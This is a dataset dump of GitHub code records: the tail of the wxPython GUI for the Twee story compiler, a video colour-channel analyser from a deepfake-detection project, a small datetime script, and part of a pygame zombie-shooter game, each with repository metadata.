Klimas\\n\\nhttp://gimcrackd.com/etc/src/')\n\t\tinfo.SetCopyright('The Twee compiler and associated JavaScript files in this application are released under the GNU Public License.\\n\\nThe files in the targets directory are derivative works of Jeremy Ruston\\'s TiddlyWiki project and are used under the terms of its license.')\n\t\twx.AboutBox(info)\n\n\t\t\n\tdef onHelp (self, event):\n\t\twx.LaunchDefaultBrowser('http://gimcrackd.com/etc/doc/')\n\n\t\t\n\tdef onGoogleGroup (self, event):\n\t\twx.LaunchDefaultBrowser('http://groups.google.com/group/tweecode')\n\n\n\tdef onNew (self, event):\n\t\tif (self.closeProject()):\n\t\t\tself.project = Project()\n\t\t\tself.fileName = ''\n\t\t\tself.dirty = True\n\t\t\tself.updateTitle()\n\t\t\tself.updateDestination()\n\t\t\tself.sourcesList.Clear()\n\t\t\t\n\t\t\t\n\tdef onOpen (self, event):\n\t\tif (self.closeProject()):\n\t\t\tdialog = wx.FileDialog(self, 'Open Project', os.getcwd(), \"\", \\\n\t\t\t\t\t\t\t\t \"Tweebox Project (*.twp)|*.twp\", \\\n\t\t\t\t\t\t\t\t wx.OPEN | wx.FD_CHANGE_DIR)\n\t\t\t\t\t\t\t\t\t\t\t\t\t \t \n\t\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\t\tself.fileName = dialog.GetPath()\n\t\t\t\tself.loadFile()\n\t\t\t\tself.recentFiles.AddFileToHistory(self.fileName)\n\t\t\t\t\n\t\t\tdialog.Destroy()\n\t\t\t\t\n\tdef onOpenRecent (self, event):\t\t\n\t\tif event.GetId() == wx.ID_FILE1:\n\t\t index = 0\n\t\telif event.GetId() == wx.ID_FILE2:\n\t\t index = 1\n\t\telif event.GetId() == wx.ID_FILE3:\n\t\t index = 2\n\t\telif event.getId() == wx.ID_FILE4:\n\t\t index = 3\n\t\telif event.getId() == wx.ID_FILE5:\n\t\t index = 4\n\t\t\t \n\t\tself.fileName = self.recentFiles.GetHistoryFile(index)\n\t\tself.loadFile()\n\n\tdef loadFile (self, failLoudly = True):\n\t\ttry:\n\t\t\tself.project = Project(self.fileName)\n\t\texcept:\n\t\t\tif failLoudly:\n\t\t\t\twx.MessageBox('Can\\'t open ' + self.fileName + '. Make sure this file has not been moved ' + \\\n\t\t\t\t \t\t 'or deleted, and that you are able to read files in this location.', \\\n\t\t\t\t\t\t\t 'Can\\'t Open File', wx.ICON_ERROR)\n\t\t\treturn\n\t\t\t\t\n\t\tself.dirty = False\n\t\t\n\t\t# sync UI to file contents\n\t\t\t\t\t\t\n\t\tself.updateTitle()\n\t\tself.updateDestination()\n\t\tself.sourcesList.Clear()\n\t\t\n\t\tfor source in self.project.sources:\n\t\t\tself.sourcesList.Append(os.path.basename(source))\n\t\t\n\t\ttarget = self.targetToReadable(self.project.target)\n\t\tself.targetChoice.SetStringSelection(target)\t\t\n\n\n\tdef displayError (self, activity):\n\t\texception = sys.exc_info()\n\t\ttext = 'An error occurred while ' + activity + ' ('\n\t\ttext += str(exception[1]) + ').'\n\t\t\n\t\terror = wx.MessageDialog(self, text, 'Error', wx.OK | wx.ICON_ERROR)\n\t\terror.ShowModal()\n\t\t\n\n\tdef onSaveAs (self, event):\n\t\tdialog = wx.FileDialog(self, 'Save Project', os.getcwd(), \"\", \\\n\t\t\t\t\t\t\t \"Tweebox Project (*.twp)|*.twp\", \\\n\t\t \t\t\t\t\t wx.SAVE | wx.FD_OVERWRITE_PROMPT | wx.FD_CHANGE_DIR)\n\t\t\n\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\tself.fileName = dialog.GetPath()\n\t\t\tself.updateTitle()\n\t\t\tself.onSave(event)\n\t\t\t\n\t\tdialog.Destroy()\n\t\t\t\n\n\tdef onSave (self, event):\n\t\tif self.fileName != '':\n\t\t\ttry:\n\t\t\t\tself.project.save(self.fileName)\n\t\t\t\tself.dirty = False\n\t\t\texcept:\n\t\t\t\tself.displayError('saving your project')\n\t\telse:\n\t\t\tself.onSaveAs(event)\n\n\n\tdef onQuit (self, event):\n\t\tif self.closeProject():\n\t\t\tself.recentFiles.Save(self.config)\n\t\t\tself.Close(True)\n\t\t\n\n\tdef onAddSource (self, event):\n\t\tdialog = wx.FileDialog(self, 'Add Source File', os.getcwd(), \"\", \\\n\t\t\t\t\t\t\t \"Twee source code (*.tw)|*.tw|Plain text files (*.txt)|*.txt\", wx.OPEN | wx.FD_CHANGE_DIR)\n\t\t\n\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\tpath = dialog.GetPath()\n\t\t\tself.project.sources.append(path)\n\t\t\tself.sourcesList.Append(os.path.basename(path))\n\t\t\tself.dirty = True\n\t\t\t\n\t\tdialog.Destroy()\n\n\n\tdef onRemoveSource (self, event):\n\t\tindex = self.sourcesList.GetSelection()\n\t\tself.project.sources.pop(index)\n\t\tself.sourcesList.Delete(index)\n\t\tself.dirty = True\n\t\t\n\t\t\n\tdef onChangeTarget (self, event):\n\t\ttarget = self.targetChoice.GetStringSelection()\n\t\tself.project.target = self.readableToTarget(target)\n\t\tself.dirty = True\n\t\t\n\n\tdef onSetDestination (self, event):\n\t\tdialog = wx.FileDialog(self, 'Save Story As', os.getcwd(), \"\", \\\n\t \t\t\t\t\t\t \"Web Page (*.html)|*.html\", \\\n\t\t\t\t\t\t\t wx.SAVE | wx.FD_OVERWRITE_PROMPT | wx.FD_CHANGE_DIR)\n\t\t\n\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\tpath = dialog.GetPath()\n\t\t\tself.project.destination = path\n\t\t\tself.dirty = True\n\t\t\tself.updateDestination()\n\t\t\tdialog.Destroy()\n\t\t\treturn True\n\t\t\t\n\t\tdialog.Destroy()\n\t\treturn False\t\t\n\n\t\t\t\t\n\tdef onBuild (self, event):\t\n\t\tif self.project.destination == '':\n\t\t\tif not self.onSetDestination(event):\n\t\t\t\treturn\n\t\t\t\t\n\t\tself.SetStatusText('Building your story...')\n\t\n\t\ttry:\n\t\t\tif self.project.build():\n\t\t\t\tpath = 'file://' + urllib.pathname2url(self.project.destination)\n\t\t\t\tpath = path.replace('file://///', 'file:///')\n\t\t\t\twx.LaunchDefaultBrowser(path)\t\n\t\t\t\tself.SetStatusText('Your story has been successfully built.')\n\t\texcept:\n\t\t\t self.displayError('building your story')\n\t\t\t self.SetStatusText('')\n\n\tdef onProof (self, event):\t\n\t\tif self.project.destination == '':\n\t\t\tif not self.onSetDestination(event):\n\t\t\t\treturn\n\t\t\t\t\n\t\tself.SetStatusText('Building proofing copy...')\n\t\n\t\ttry:\n\t\t\tif self.project.proof():\t\n\t\t\t\tself.SetStatusText('Your proofing copy has been successfully built.')\n\t\texcept:\n\t\t\t self.displayError('building a proofing copy of your story')\n\t\t\t self.SetStatusText('')", "repo_name": "factorypreset/twee", "sub_path": "twee/branches/1.5/lib/gui.py", "file_name": "gui.py", "file_ext": "py", "file_size_in_byte": 12936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "wx.Frame", "line_number": 30, "usage_type": "attribute"}, {"api_name": "wx.Config", "line_number": 40, "usage_type": "call"}, {"api_name": "wx.FileHistory", "line_number": 41, "usage_type": "call"}, {"api_name": "project.Project", "line_number": 46, "usage_type": "call"}, {"api_name": "wx.Frame.__init__", "line_number": 52, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.CLOSE_BOX", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.CAPTION", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.SYSTEM_MENU", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.MINIMIZE_BOX", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.Menu", "line_number": 74, "usage_type": "call"}, {"api_name": "wx.ID_ABOUT", "line_number": 75, "usage_type": "attribute"}, {"api_name": "wx.Menu", "line_number": 79, "usage_type": "call"}, {"api_name": "wx.ID_EXIT", "line_number": 86, "usage_type": "attribute"}, {"api_name": "wx.Menu", "line_number": 90, "usage_type": "call"}, {"api_name": "wx.MenuBar", "line_number": 99, "usage_type": "call"}, {"api_name": "wx.EVT_UPDATE_UI", "line_number": 107, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 109, "usage_type": "call"}, {"api_name": "wx.ID_ABOUT", "line_number": 109, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 110, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 111, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 112, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 113, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 114, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 115, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 116, "usage_type": "call"}, {"api_name": "wx.ID_EXIT", "line_number": 116, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 117, "usage_type": "call"}, {"api_name": "wx.ID_FILE1", "line_number": 117, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 118, "usage_type": "call"}, {"api_name": "wx.ID_FILE2", "line_number": 118, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 119, "usage_type": "call"}, {"api_name": "wx.ID_FILE3", "line_number": 119, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 120, "usage_type": "call"}, {"api_name": "wx.ID_FILE4", "line_number": 120, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 121, "usage_type": "call"}, {"api_name": "wx.ID_FILE5", "line_number": 121, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 122, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 123, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 124, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 125, "usage_type": "call"}, {"api_name": "wx.Panel", "line_number": 129, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 130, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 130, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 135, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 136, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 136, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 137, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 137, "usage_type": "attribute"}, {"api_name": "wx.ListBox", "line_number": 140, "usage_type": "call"}, {"api_name": "wx.Button", "line_number": 141, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 142, "usage_type": "call"}, {"api_name": "wx.EXPAND", "line_number": 144, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 145, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_RIGHT", "line_number": 145, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 149, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 150, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 150, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 151, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 151, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 156, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 157, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 157, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 160, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 161, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 162, "usage_type": "call"}, {"api_name": "wx.TOP", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 165, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 165, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 167, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 171, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 172, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 172, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 175, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 175, "usage_type": "attribute"}, {"api_name": "wx.Choice", "line_number": 177, "usage_type": "call"}, {"api_name": "wx.EVT_CHOICE", "line_number": 181, "usage_type": "call"}, {"api_name": "wx.TOP", "line_number": 183, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 183, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 186, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 186, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 190, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 190, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.NOT_FOUND", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 232, "usage_type": "call"}, {"api_name": "os.path", "line_number": 232, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 233, "usage_type": "call"}, {"api_name": "os.path", "line_number": 233, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 236, "usage_type": "call"}, {"api_name": "wx.ICON_QUESTION", "line_number": 237, "usage_type": "attribute"}, {"api_name": "wx.YES_NO", "line_number": 237, "usage_type": "attribute"}, {"api_name": "wx.NO_DEFAULT", "line_number": 237, "usage_type": "attribute"}, {"api_name": "wx.ID_YES", "line_number": 238, "usage_type": "attribute"}, {"api_name": "wx.AboutDialogInfo", "line_number": 275, "usage_type": "call"}, {"api_name": "wx.AboutBox", "line_number": 280, "usage_type": "call"}, {"api_name": "wx.LaunchDefaultBrowser", "line_number": 284, "usage_type": "call"}, {"api_name": "wx.LaunchDefaultBrowser", "line_number": 288, "usage_type": "call"}, {"api_name": "project.Project", "line_number": 293, "usage_type": "call"}, {"api_name": "wx.FileDialog", "line_number": 303, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 303, "usage_type": "call"}, {"api_name": "wx.OPEN", "line_number": 305, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 305, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 307, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE1", "line_number": 315, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE2", "line_number": 317, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE3", "line_number": 319, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE4", "line_number": 321, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE5", "line_number": 323, "usage_type": "attribute"}, {"api_name": "project.Project", "line_number": 331, "usage_type": "call"}, {"api_name": "wx.MessageBox", "line_number": 334, "usage_type": "call"}, {"api_name": "wx.ICON_ERROR", "line_number": 336, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 348, "usage_type": "call"}, {"api_name": "os.path", "line_number": 348, "usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 355, "usage_type": "call"}, {"api_name": "wx.MessageDialog", "line_number": 359, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 359, "usage_type": "attribute"}, {"api_name": "wx.ICON_ERROR", "line_number": 359, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 364, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 364, "usage_type": "call"}, {"api_name": "wx.SAVE", "line_number": 366, "usage_type": "attribute"}, {"api_name": "wx.FD_OVERWRITE_PROMPT", "line_number": 366, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 366, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 368, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 394, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 394, "usage_type": "call"}, {"api_name": "wx.OPEN", "line_number": 395, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 395, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 397, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 400, "usage_type": "call"}, {"api_name": "os.path", "line_number": 400, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 420, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 420, "usage_type": "call"}, {"api_name": "wx.SAVE", "line_number": 422, "usage_type": "attribute"}, {"api_name": "wx.FD_OVERWRITE_PROMPT", "line_number": 422, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 422, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 424, "usage_type": "attribute"}, {"api_name": "urllib.pathname2url", "line_number": 445, "usage_type": "call"}, {"api_name": "wx.LaunchDefaultBrowser", "line_number": 447, "usage_type": "call"}]}
+{"seq_id": "34184206592", "text": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nfrom tqdm import tqdm\n\nclass channel_visualizer():\n def __init__(self, input_video_path, outpath, colorspace = 'ycrbr', win_size=60, plot_W = 640, plot_H = 480):\n self.win_size = win_size\n self.plot_W = plot_W\n self.plot_H = plot_H\n \n try:\n self.input_capture = cv2.VideoCapture(input_video_path)\n except:\n raise ValueError('Input video path %s not valid' % input_video_path)\n \n if self.input_capture is not None: \n self.tot_input_vid_frames = int(self.input_capture.get(cv2.CAP_PROP_FRAME_COUNT)) \n self.input_cap_fps = int(self.input_capture.get(cv2.CAP_PROP_FPS))\n self.W , self.H = int(self.input_capture.get(3)), int(self.input_capture.get(4)) #input video dimensions\n else:\n raise ValueError(\"Invalid input video\")\n \n self.chan1 = []\n self.chan2 = []\n self.chan3 = []\n\n self.chan12 = []\n self.chan13 = []\n self.chan23 = []\n\n self.num_pixels = self.W * self.H\n for i in range(self.num_pixels):\n self.chan1.append([])\n self.chan2.append([])\n self.chan3.append([])\n self.chan12.append([])\n self.chan23.append([])\n self.chan13.append([])\n\n self.colorspace = colorspace\n if colorspace == 'ycrbr':\n self.chan1_name = 'Y'\n self.chan2_name = 'Cr'\n self.chan3_name = 'Br'\n print('YCrBr analysis')\n elif colorspace == 'bgr':\n self.chan1_name = 'B'\n self.chan2_name = 'G'\n self.chan3_name = 'R'\n\n self.frame_num = 0\n\n self.outpath = outpath\n self.input_vid_name = 'mp_' + input_video_path.split('/')[-1][:-4]\n \n \n def run(self):\n \"\"\"\n process the input video!\n \"\"\"\n\n #generate data\n with tqdm(total=self.tot_input_vid_frames) as pbar:\n pbar.set_description('Generating color channel visualization data')\n while self.input_capture.isOpened():\n ret, frame = self.input_capture.read()\n if ret:\n self.frame_num += 1\n if self.chan1_name == 'Y':\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2YCR_CB)\n for i in range(self.num_pixels):\n r = int(i / self.W)\n c = i % self.W\n self.chan1[i].append(frame[r, c, 0])\n self.chan2[i].append(frame[r, c, 1])\n self.chan3[i].append(frame[r, c, 2])\n self.chan12[i].append(frame[r, c, 0] / frame[r, c, 1])\n self.chan13[i].append(frame[r, c, 0] / frame[r, c, 2])\n self.chan23[i].append(frame[r, c, 1] / frame[r, c, 2])\n else:\n break\n pbar.update(1)\n for i in range(900):\n print(self.chan1[i][10])\n #save all data\n with open(f'{self.outpath}/{self.colorspace}_{self.input_vid_name}_pixelwise_channel_data.pkl','wb') as f:\n data_dict = {\n 'chan1':self.chan1, \n 'chan2':self.chan2, \n 'chan3':self.chan3, \n 'chan12':self.chan12,\n 'chan13':self.chan13,\n 'chan23':self.chan23,\n }\n pickle.dump(data_dict, f)\n\n ", "repo_name": "Hadleigh-Schwartz/deepfake_detection", "sub_path": "evm_experiments/vis_channels_pixelwise.py", "file_name": "vis_channels_pixelwise.py", "file_ext": "py", "file_size_in_byte": 3551, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.VideoCapture", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_COUNT", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2YCR_CB", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 97, "usage_type": "call"}]}
+{"seq_id": "6654316188", "text": "# importing datetime module\n\nimport datetime\nimport time\nfrom datetime import timedelta\n\n#### display the current time in UNIX format\n\n# assigned regular string date\ndate_time = datetime.datetime(2023, 1, 26, 15, 20)\n \n # print regular python date&time\nprint(\"date_time =>\",date_time)\n\n \n# displaying unix timestamp after conversion\nprint(\"unix_timestamp => \",\n (time.mktime(date_time.timetuple())))\n\n#######\n####### calculate the time from today until a given date, outputs the delta\ntime_now = datetime.datetime.now()\npast_date1 = time_now - timedelta(days=189)\nprint(past_date1) \n\n# What day will it be after 180 days\nfuture_date2 = time_now + timedelta(days=189)\nprint(future_date2)\n\n# What day would it have been 150 days ago\npast_date1 = time_now - timedelta(days=189)\nprint(past_date1)\n\n\n\n", "repo_name": "mathiasgrosse/Best_GroupDCI", "sub_path": "unixformat.py", "file_name": "unixformat.py", "file_ext": "py", "file_size_in_byte": 802, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime", "line_number": 10, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "35044616496", "text": "import pygame, sys\nfrom pygame import mixer\nimport random\nimport math\n\npygame.init()\nmixer.init()\npygame.font.init()\n\n# CONSTANTS\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = (int)(SCREEN_WIDTH * 0.8)\nBG = (105, 105, 105)\nBG_IMAGE = pygame.image.load('misc/bg_image.jpg')\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nFPS = 60\n\n#ICON\nprogramIcon = pygame.image.load('misc/icon.png')\npygame.display.set_icon(programIcon)\n\noriginal_wizard1image = pygame.image.load('good/wizard1.png')\noriginal_wizard2image = pygame.image.load('good/wizard2.png')\noriginal_zombieimage = pygame.image.load('bad/zombie.png')\n\n# MUSIC CONSTANTS\nmain_menu_music = pygame.mixer.Sound('music/main_menu.mp3')\nmain_menu_music.set_volume(1)\n# funny_bit, retro_platforming, castle_of_fear\nmusic = pygame.mixer.Sound('music/funny_bit.mp3')\nmusic.set_volume(0.7)\nlaser_sfx = pygame.mixer.Sound('music/lasersfx.wav')\nlaser_sfx.set_volume(0.5)\n\n# FONT CONSTANTS\nfont_score = pygame.font.Font('misc/8-bit Arcade In.ttf', 100)\nfont = pygame.font.Font('misc/8-bit Arcade In.ttf', 35)\nfont_gameover = pygame.font.Font('misc/8-bit Arcade In.ttf', 200)\n\n# DISPLAY\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"Laser-Bound\")\n\n# DEFINE PLAYER ACTION VARIBALES\none_moving_left = False\none_moving_right = False\none_moving_up = False\none_moving_down = False\n\ntwo_moving_left = False\ntwo_moving_right = False\ntwo_moving_up = False\ntwo_moving_down = False\n\n\nclass Character(pygame.sprite.Sprite):\n def __init__(self, number, x, y, scale, speed):\n self.speed = speed\n self.scale = scale\n self.number = number\n\n image = pygame.image.load(f'good/wizard{number}.png').convert_alpha()\n self.image = pygame.transform.scale(image, (int(image.get_width() * scale), int(image.get_height() * scale)))\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n\n def move(self, moving_left, moving_right, moving_up, moving_down):\n # promjena x i y koordinate\n dx = 0\n dy = 0\n\n if moving_left:\n if self.rect.left > 0:\n dx = -self.speed\n if moving_right:\n if self.rect.right < SCREEN_WIDTH:\n dx = self.speed\n if moving_up:\n if self.rect.top > 0:\n dy = -self.speed\n if moving_down:\n if self.rect.bottom < SCREEN_HEIGHT:\n dy = self.speed\n\n # update rectangle position\n self.rect.x += dx\n self.rect.y += dy\n\n def draw(self):\n if self.number == '1':\n main = (main1.rect.center)\n secondary = (main2.rect.center)\n else:\n main = (main2.rect.center)\n secondary = (main1.rect.center)\n ang_x, ang_y = secondary[0] - main[0], secondary[1] - main[1]\n angle = (180 / math.pi) * - math.atan2(ang_y, ang_x) - 90\n if self.number == '1':\n self.image = pygame.transform.rotozoom(original_wizard1image, int(angle), self.scale)\n screen.blit(self.image, self.rect)\n else:\n self.image = pygame.transform.rotozoom(original_wizard2image, int(angle), self.scale)\n screen.blit(self.image, self.rect)\n\n\n\nclass Zombie(pygame.sprite.Sprite):\n def __init__(self, x, y, scale, speed):\n pygame.sprite.Sprite.__init__(self, zombie_group)\n self.speed = speed\n self.check = 0\n self.num = random.choice(main)\n self.scale = scale\n\n img = pygame.image.load('bad/zombie.png').convert_alpha()\n self.image = pygame.transform.scale(img, (int(img.get_width() * scale), int(img.get_height() * scale)))\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n\n def move(self):\n dx = self.speed\n dy = self.speed\n\n if self.rect.x > self.num.rect.x:\n self.rect.x += -dx\n else:\n self.rect.x += dx\n\n if self.rect.y > self.num.rect.y:\n self.rect.y += -dy\n else:\n self.rect.y += dy\n\n #self.check += 1\n\n # collision with player\n if self.rect.colliderect(main1) or self.rect.colliderect(main2):\n gameover()\n #pygame.display.quit()\n\n\n def draw(self):\n if self.num == main1:\n main = (self.rect.center)\n secondary = (main1.rect.center)\n else:\n main = (self.rect.center)\n secondary = (main2.rect.center)\n ang_x, ang_y = secondary[0] - main[0], secondary[1] - main[1]\n angle = (180 / math.pi) * -math.atan2(ang_y, ang_x) - 270\n self.image = pygame.transform.rotozoom(original_zombieimage, int(angle), self.scale)\n screen.blit(self.image, self.rect)\n\n\ndef draw_bg():\n screen.fill(BG)\n screen.blit(BG_IMAGE, (0, 0))\n\ndef draw_tutorial():\n wasd_blue = pygame.image.load('misc/wasd.png')\n wasd_red = pygame.image.load('misc/arrowkeys.png')\n wasd_blue = pygame.transform.scale(wasd_blue, (wasd_blue.get_width() * 0.3, wasd_blue.get_height() * 0.3))\n wasd_red = pygame.transform.scale(wasd_red, (wasd_red.get_width() * 0.3, wasd_red.get_height() * 0.3))\n screen.blit(wasd_blue, (main1.rect.centerx - 55, main1.rect.centery - 100))\n screen.blit(wasd_red, (main2.rect.centerx - 55, main2.rect.centery - 100))\n\ndef distance_point_line(pt, l1, l2):\n NV = pygame.math.Vector2(l1[1] - l2[1], l2[0] - l1[0])\n LP = pygame.math.Vector2(l1) # moze i l2\n P = pygame.math.Vector2(pt)\n return abs(\n NV.normalize().dot(P - LP)) # dot je mnozenje vektora sa skalarom. P-LP je smjer koji main1 ima prema zombie\n\ndef fade(width, height, button_play, button_exit, logo):\n fade = pygame.Surface((width, height))\n fade.fill((0, 0, 0))\n for alpha in range(300):\n fade.set_alpha(alpha)\n draw_bg()\n screen.blit(button_play, (100, 400))\n screen.blit(button_exit, (550, 400))\n screen.blit(logo, (100, 200))\n screen.blit(fade, (0,0))\n pygame.display.update()\n pygame.time.delay(1)\n\ndef gameover():\n score_text = font_gameover.render(str(getScore()), False, WHITE)\n highscore_text = font_gameover.render(str(getHighscore()), False, WHITE)\n gameover_menu = pygame.image.load(\"misc/gameover_img.png\")\n button_restart = pygame.image.load(\"ui/button_restart.png\")\n button_restart_hover = pygame.image.load(\"ui/button_restart_hover.png\")\n button_exit = pygame.image.load(\"ui/button_gameover_exit.png\")\n button_exit_hover = pygame.image.load(\"ui/button_gameover_exit_hover.png\")\n\n global click\n\n screen.blit(gameover_menu, (250, 100))\n screen.blit(score_text, (335, 365))\n screen.blit(highscore_text, (570, 365))\n\n gameover = True\n while gameover:\n mx, my = pygame.mouse.get_pos()\n\n screen.blit(button_restart, (285, 550))\n button_restart_rect = pygame.Rect(285, 550, 230, 90)\n if button_restart_rect.collidepoint((mx, my)):\n screen.blit(button_restart_hover, (285, 550))\n if click:\n for zombie in zombie_group:\n zombie.kill()\n gameover = False\n screen.blit(button_exit, (550, 550))\n button_exit_rect = 